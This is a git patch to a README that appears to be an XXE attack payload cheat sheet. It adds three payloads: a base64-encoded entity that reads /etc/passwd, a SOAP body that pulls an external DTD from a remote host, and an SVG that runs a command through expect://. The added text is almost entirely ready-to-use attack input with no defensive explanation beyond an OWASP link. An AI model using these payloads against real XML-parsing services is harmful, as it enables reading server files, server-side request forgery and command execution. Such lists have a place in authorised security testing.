From 7759d6fd5f35b898872f23fc025218065e7ddf1e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C4=B0smail=20Ta=C5=9Fdelen?=
 <ismailtasdelen@users.noreply.github.com>
Date: Sat, 23 Nov 2019 10:41:36 +0300
Subject: [PATCH] Update README.md

---
 README.md | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)

diff --git a/README.md b/README.md
index bcde9e3..43cd908 100644
--- a/README.md
+++ b/README.md
@@ -127,6 +127,30 @@ There are various types of XXE attacks:
 +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
 ```
 
+###### XXE: Base64 Encoded
+
+```
+<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
+```
+
+###### XXE: XXE inside SOAP Example
+
+```
+<soap:Body>
+  <foo>
+    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
+  </foo>
+</soap:Body>
+```
+
+###### XXE: XXE inside SVG
+
+```
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
+    <image xlink:href="expect://ls"></image>
+</svg>
+```
+
 #### References :
  
 👉 [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)